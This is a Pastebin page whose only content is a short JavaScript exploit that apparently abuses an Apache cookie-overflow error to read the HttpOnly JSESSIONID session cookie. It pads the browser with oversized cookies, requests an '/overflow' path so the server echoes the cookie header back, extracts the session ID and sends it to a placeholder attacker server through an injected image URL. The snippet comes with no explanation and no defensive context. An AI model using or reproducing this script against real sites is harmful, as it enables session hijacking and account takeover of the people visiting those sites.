Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script>
- var value=get_cookie_apache_overflow("JSESSIONID");
- document.write("<img src=\"http://<attackers-server>/" + value + "\">");
- function get_cookie_apache_overflow(cookiename) {
- var cv = (new Array(1024)).join("x");
- var xmlHttp = new XMLHttpRequest();
- xmlHttp.open( "GET", "/overflow", false );
- for (var i=0; i< 15; i++) {document.cookie="c"+i+"="+cv+";path=/";}
- xmlHttp.send( null );
- for (var i=0; i< 15; i++) {document.cookie="c"+i+"="+cv+";path=/;expires=Thu, 01 Jan 1970 00:00:00 UTC";}
- //document.write(xmlHttp.responseText);
- return xmlHttp.responseText.substring(xmlHttp.responseText.indexOf(cookiename)).split(";",2)[0].split("=",3)[1];
- }
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement